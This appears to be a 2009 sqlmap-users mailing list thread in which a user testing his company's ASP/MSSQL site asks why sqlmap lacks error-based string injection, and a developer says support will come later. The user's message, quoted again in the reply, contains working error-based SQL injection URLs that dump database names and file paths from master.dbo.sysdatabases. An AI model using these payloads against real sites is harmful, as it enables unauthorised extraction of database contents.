sqlmap-users

[sqlmap-users] sqlmap and string injections

[One T. <one...@ym...>]

Hi,
Does sqlmap supports string injections?
I'm asking this because I'm testing sqlmap on my company site (ASP + MSSQL 2000) wich is vulnerable to SQL injection.

Example:
www.xyz.com/default.asp?pag=anypage.asp
"pag" is the injectable parameter

I'm able to succesfully enumerate users and databases using sqlmap only via blind sql Injection because for some reason other supported sql injection methods fail with the error: "[WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going blind"

Using other scanners I noticed that it is possible to dump data (for example databases listing) using queries like these:
www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top  27 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top  28 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top  29 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
ecc..
This method is really fast (behind proxy too) compared to the extreme slowness of a blind SQL Injection.

Why sqlmap doens't detect this type of injection?

Thank you
Regards



      

Re: [sqlmap-users] sqlmap and string injections

[Bernardo D. A. G. <ber...@gm...>]

sqlmap supports string injections, but not with the following error
based payload. It will come in the long run.

Cheers,
B



On Sun, Dec 6, 2009 at 15:55, One Time <one...@ym...> wrote:
> Hi,
> Does sqlmap supports string injections?
> I'm asking this because I'm testing sqlmap on my company site (ASP + MSSQL
> 2000) wich is vulnerable to SQL injection.
>
> Example:
> www.xyz.com/default.asp?pag=anypage.asp
> "pag" is the injectable parameter
>
> I'm able to succesfully enumerate users and databases using sqlmap only via
> blind sql Injection because for some reason other supported sql injection
> methods fail with the error: "[WARNING] for some reasons it was not possible
> to retrieve the query output through inband SQL injection technique, sqlmap
> is going blind"
>
> Using other scanners I noticed that it is possible to dump data (for example
> databases listing) using queries like these:
> www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as
> nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top
> 27 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t
> order by [dbid] desc)--
> www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as
> nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top
> 28 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t
> order by [dbid] desc)--
> www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as
> nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top
> 29 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t
> order by [dbid] desc)--
> ecc..
> This method is really fast (behind proxy too) compared to the extreme
> slowness of a blind SQL Injection.
>
> Why sqlmap doens't detect this type of injection?
>
> Thank you
> Regards
>
>
> ------------------------------------------------------------------------------
> Join us December 9, 2009 for the Red Hat Virtual Experience,
> a free event focused on virtualization and cloud computing.
> Attend in-depth sessions from your desk. Your couch. Anywhere.
> http://p.sf.net/sfu/redhat-sfdev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F